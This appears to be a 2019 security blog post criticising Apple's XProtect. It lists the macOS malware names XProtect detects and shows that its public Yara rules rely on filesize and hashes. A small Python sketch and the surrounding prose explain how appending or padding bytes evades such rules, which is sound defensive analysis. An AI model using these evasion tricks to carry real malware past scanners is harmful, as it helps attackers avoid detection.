"OSX.CrossRider.A","MACOS.6175e25","MACOS.d1e06b8","OSX.28a9883","OSX.Bundlore.D", "OSX.ParticleSmasher.A","OSX.HiddenLotus.A","OSX.Mughthesec.B","OSX.HMining.D", "OSX.Bundlore.B","OSX.AceInstaller.B","OSX.AdLoad.B.2","OSX.AdLoad.B.1","OSX.AdLoad.A", "OSX.Mughthesec.A","OSX.Leverage.A","OSX.ATG15.B","OSX.Genieo.G","OSX.Genieo.G.1", "OSX.Proton.B","OSX.Dok.B","OSX.Dok.A","OSX.Bundlore.A","OSX.Findzip.A","OSX.Proton.A", "OSX.XAgent.A","OSX.iKitten.A","OSX.HMining.C","OSX.HMining.B","OSX.Netwire.A", "OSX.Bundlore.B","OSX.Eleanor.A","OSX.HMining.A","OSX.Trovi.A","OSX.Hmining.A", "OSX.Bundlore.A","OSX.Genieo.E","OSX.ExtensionsInstaller.A","OSX.InstallCore.A", "OSX.KeRanger.A","OSX.GenieoDropper.A","OSX.XcodeGhost.A","OSX.Genieo.D","OSX.Genieo.C", "OSX.Genieo.B","OSX.Vindinstaller.A","OSX.OpinionSpy.B","OSX.Genieo.A","OSX.InstallImitator.C", "OSX.InstallImitator.B","OSX.InstallImitator.A","OSX.VSearch.A","OSX.Machook.A","OSX.Machook.B", "OSX.iWorm.A","OSX.iWorm.B/C","OSX.NetWeird.ii","OSX.NetWeird.i","OSX.GetShell.A", "OSX.LaoShu.A","OSX.Abk.A","OSX.CoinThief.A","OSX.CoinThief.B","OSX.CoinThief.C", "OSX.RSPlug.A","OSX.Iservice.A/B","OSX.HellRTS.A","OSX.OpinionSpy","OSX.MacDefender.A", "OSX.MacDefender.B","OSX.QHostWB.A","OSX.Revir.A","OSX.Revir.ii","OSX.Flashback.A", "OSX.Flashback.B","OSX.Flashback.C","OSX.DevilRobber.A","OSX.DevilRobber.B", "OSX.FileSteal.ii","OSX.FileSteal.i","OSX.Mdropper.i","OSX.FkCodec.i","OSX.MaControl.i", "OSX.Revir.iii","OSX.Revir.iv","OSX.SMSSend.i","OSX.SMSSend.ii","OSX.eicar.com.i", "OSX.AdPlugin.i","OSX.AdPlugin2.i","OSX.Leverage.a","OSX.Prxl.2"

These include Eicar and the first XProtect samples from September 2009 (OSX.RSPlug.A, OSX.Iservice).

XProtect relies on Yara rules published in plain sight. Yara is great for analysts "hunting" malware, but it is far from clear that it is the best option for protection, particularly when the rules themselves are public, disclosing both the detection method and the exact conditions under which it fires. That opens the door for malware authors to simply tweak their samples around them. Yara rules must not merely be written; they must be written well, pinned to a genuine singularity of the sample, so as to avoid false positives and to ensure an attacker cannot dodge a condition without also modifying the payload itself. In this respect, it is striking how much Apple trusts filesize to detect malware, presumably in the name of "efficiency".

[Image: XProtect's Yara rule that relies on a hash]

In this rule, the file must be smaller than 3,500 bytes (the sample behind the hash is barely 2 KB) before the hash is even computed. Any downloaded file under that size is compared against a handful of hashes, well known since 2016. The rule first discriminates by filesize and then matches a hash: two variables of very little resilience. With this same size-plus-hash structure we can identify 42 of the 92 XProtect Yara rules: they filter by filesize and then rely on hashes to detect the malware.

They do not rely on hashes alone. XProtect's Yara rules also use significant strings to detect malware, adding the filesize at the end as a key condition.

[Image: An example of XProtect's Yara rule]

According to this rule, the sample must be a Mach-O binary, contain all the listed strings and be smaller than 200 KB. If it contains every string but is larger than 200 KB, the condition is not met and the file goes undetected.
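How fragile is a filesize-plus-hash condition? The sketch below, written with the yara-python bindings and a made-up rule in the same style (not Apple's actual rule), shows that appending a single byte is enough to slip past it. It assumes a yara-python build that includes the hash module:

    # Sketch: a hash-based rule in the XProtect style, and its trivial evasion.
    import hashlib
    import yara  # pip install yara-python

    sample = b"pretend this is a tiny malicious binary"
    sha1 = hashlib.sha1(sample).hexdigest()

    rule_src = f'''
    import "hash"

    rule Hypothetical_HashOnly
    {{
        condition:
            filesize < 3500 and
            hash.sha1(0, filesize) == "{sha1}"
    }}
    '''

    rules = yara.compile(source=rule_src)
    print(bool(rules.match(data=sample)))            # True: detected
    print(bool(rules.match(data=sample + b"\x00")))  # False: one byte evades it

The same appending trick, pushed past a rule's filesize threshold, also defeats the string-based rules without touching the payload at all.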
Using filesize inside Yara rules is not strange or wrong in essence, but in these cases, as a condition in a protection system (rather than a "hunting" tool), it does not look robust. With this filesize-first formula, 27 of the detections (a third) could be evaded simply by altering the file's size. Remember that 42 of them (almost half) could be evaded by tampering with a single bit of the file. And all of this with only 92 signatures in the "database", analyzing only programs arriving through very specific channels (Safari, Mail, iChat and Messages). If we wanted to split hairs, we could add that SHA-1 is already considered obsolete for computing these hashes, although that matters little in this context.

Conclusions

XProtect is not meant to compete with any antivirus, truth be told; it is designed to detect known malware. That said, "known malware" is not the same as "known sample": it should cover at least families, not specific files. We should not expect much from it, but it has to be understood as a first, very thin line of protection against threats, and even on those modest terms it does not fulfil its task. Its rules detect by hash, they are few, and the definitions arrive long after the malware has been all over the media. Someone could argue that these few signatures may still cover most of the known malware for MacOS; whether or not that is true, its reaction capability and detection formula paint an unflattering picture of the system as a whole. We cannot expect real protection from XProtect, then, not even reactive protection. What can be expected from it? Purely and simply making some users feel secure by displaying a reassuring message on their systems under "ideal infection conditions".

In Apple's favour, it must be said that at least it is not Android (whose Play Protect detection system is ineffective, but at least can be justified), and above all that if users strictly download from the App Store there are some guarantees. Unlike Google Play, and although its store is not entirely free of malware, the App Store is quite secure, as are iOS and its applications.

So, the eternal question that deniers are so fond of: do you need an antimalware on your MacOS? We could answer yes, you do, but not XProtect. Do not feed the fire, but do not feed the myths either.

Sergio de los Santos
Innovation and Labs (ElevenPaths)
ssantos@11paths.com
@ssantosv
May 6, 2019